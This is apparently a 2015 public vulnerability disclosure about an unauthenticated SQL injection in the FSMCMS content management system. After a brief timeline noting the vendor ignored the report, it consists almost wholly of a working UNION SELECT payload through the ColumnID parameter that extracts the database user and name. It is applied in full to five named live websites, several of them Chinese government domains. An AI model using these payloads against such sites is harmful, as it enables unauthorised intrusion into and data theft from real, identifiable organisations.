2015-10-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-16: 厂商已经主动忽略漏洞,细节向公众公开
RT
北京东方文辉信息技术有限公司 官网地址:http://www.fsmcms.com.cn sql注入无需登录漏洞EXP及案例:
http://110.17.162.177/fsmcms/cms/web/columninfo.jsp?ColumnID=-5 UNION SELECT 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38#http://www.gxhzjw.gov.cn/fsmcms/cms/web/columninfo.jsp?ColumnID=-5 UNION SELECT 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38#http://www.cnfia.cn/fsmcms/cms/web/columninfo.jsp?ColumnID=-5 UNION SELECT 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38#http://xfj.wuhai.gov.cn/fsmcms/cms/web/columninfo.jsp?ColumnID=-5 UNION SELECT 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38#http://www.hzfgw.gov.cn/fsmcms/cms/web/columninfo.jsp?ColumnID=-5 UNION SELECT 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38#
如上
未能联系到厂商或者厂商积极拒绝